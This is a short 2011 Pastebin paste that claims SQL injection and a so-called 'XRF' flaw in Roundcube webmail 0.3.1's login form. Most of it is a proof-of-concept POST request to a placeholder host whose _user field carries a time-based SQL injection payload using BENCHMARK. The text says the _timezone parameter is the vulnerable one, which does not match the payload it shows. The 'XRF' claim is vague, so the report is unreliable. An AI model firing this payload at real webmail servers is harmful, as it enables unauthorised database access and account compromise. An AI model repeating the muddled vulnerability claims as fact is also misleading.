Guest User

Untitled

a guest
Oct 11th, 2011
56
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1. _timezone=
  2. is vulnerable to SQL Union Injection.
  3.  
  4. "POST" data in
  5.  
  6. http://site.com/roundcube/index.php
  7.  
  8. _pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1"
  9.  
  10.  
  11. XRF vulnerable [ POC ]
  12.  
  13. POST variable
  14.  
  15. changing variable _action=login to "_action=anything" shows you the site is
  16. vulnerable to XRF attacks. When you replay it with HTTP Live headers, you
  17. see a logged in URL which shows the roundcube 0.3.1 is vulnerable to XRF
  18. attacks. Successful tampering will lead to username compromising.
  19.  
  20. _action=loggedin
  21.  
  22.  
  23. # [2011-10-10]
  24.  
Advertisement
Add Comment
Please, Sign In to add comment